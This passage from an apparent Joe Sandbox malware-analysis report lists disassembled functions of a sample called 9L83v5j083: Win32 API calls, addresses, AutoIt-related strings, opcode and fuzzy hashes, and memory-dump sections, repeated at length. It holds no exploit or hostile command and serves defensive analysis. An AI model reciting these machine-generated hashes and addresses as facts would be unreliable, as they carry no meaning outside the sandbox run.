                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2710830443-0
                                                                                                                  • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                                                  • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                                                                                  • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                                                  • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                                                                                  APIs
                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                                                                                  • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                                                                                  • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                                                                                  • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                                                                                    • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                                                                                    • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 146765662-0
                                                                                                                  • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                                                  • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                                                                                  • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                                                  • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                                                                                  APIs
                                                                                                                  • GetDesktopWindow.USER32 ref: 00472B63
                                                                                                                  • GetDC.USER32(00000000), ref: 00472B6C
                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2889604237-0
                                                                                                                  • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                                                                  • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                                                                                  • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                                                                  • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                                                                                  APIs
                                                                                                                  • GetDesktopWindow.USER32 ref: 00472BB2
                                                                                                                  • GetDC.USER32(00000000), ref: 00472BBB
                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2889604237-0
                                                                                                                  • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                                                                  • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                                                                                  • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                                                                  • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                                                                                  APIs
                                                                                                                  • __getptd_noexit.LIBCMT ref: 00415150
                                                                                                                    • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                                                                                    • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                                                                                    • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                                                                                    • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                                                                                    • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                                                                                  • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                                                                                  • __freeptd.LIBCMT ref: 0041516B
                                                                                                                  • ExitThread.KERNEL32 ref: 00415173
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1454798553-0
                                                                                                                  • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                                                                  • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                                                                                  • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                                                                  • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _strncmp
                                                                                                                  • String ID: Q\E
                                                                                                                  • API String ID: 909875538-2189900498
                                                                                                                  • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                                                                  • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                                                                                  • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                                                                  • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                                                                                  APIs
                                                                                                                  • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                    • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                                                                                    • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                                                    • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                                                                                  • String ID: AutoIt3GUI$Container
                                                                                                                  • API String ID: 2652923123-3941886329
                                                                                                                  • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                                                                  • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                                                                                  • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                                                                  • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove_strncmp
                                                                                                                  • String ID: U$\
                                                                                                                  • API String ID: 2666721431-100911408
                                                                                                                  • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                                                                  • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                                                                                  • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                                                                  • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                    • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                  • __wcsnicmp.LIBCMT ref: 00467288
                                                                                                                  • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                                                                  • String ID: LPT
                                                                                                                  • API String ID: 3035604524-1350329615
                                                                                                                  • Opcode ID: 3d5f434a59475b58f50c217a871fcdbd2ab5cc1753bb95236303f7f2d86bf337
                                                                                                                  • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                                                                                  • Opcode Fuzzy Hash: 3d5f434a59475b58f50c217a871fcdbd2ab5cc1753bb95236303f7f2d86bf337
                                                                                                                  • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove
                                                                                                                  • String ID: \$h
                                                                                                                  • API String ID: 4104443479-677774858
                                                                                                                  • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                                                                  • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                                                                                  • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                                                                  • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memcmp
                                                                                                                  • String ID: &
                                                                                                                  • API String ID: 2931989736-1010288
                                                                                                                  • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                                                                  • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                                                                                  • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                                                                  • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove
                                                                                                                  • String ID: \
                                                                                                                  • API String ID: 4104443479-2967466578
                                                                                                                  • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                                                                  • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                                                                                  • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                                                                  • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                                                                                  APIs
                                                                                                                  • _wcslen.LIBCMT ref: 00466825
                                                                                                                  • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CrackInternet_wcslen
                                                                                                                  • String ID: |
                                                                                                                  • API String ID: 596671847-2343686810
                                                                                                                  • Opcode ID: 7cb74d60865eca5b28057979f277cd03318605ef9fe3268a007aa21ef86e616b
                                                                                                                  • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                                                                                  • Opcode Fuzzy Hash: 7cb74d60865eca5b28057979f277cd03318605ef9fe3268a007aa21ef86e616b
                                                                                                                  • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID: '
                                                                                                                  • API String ID: 3850602802-1997036262
                                                                                                                  • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                                                                  • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                                                                                  • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                                                                  • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                                                                                  APIs
                                                                                                                  • _strlen.LIBCMT ref: 0040F858
                                                                                                                    • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                                                                                    • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                                                                                  • _sprintf.LIBCMT ref: 0040F9AE
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
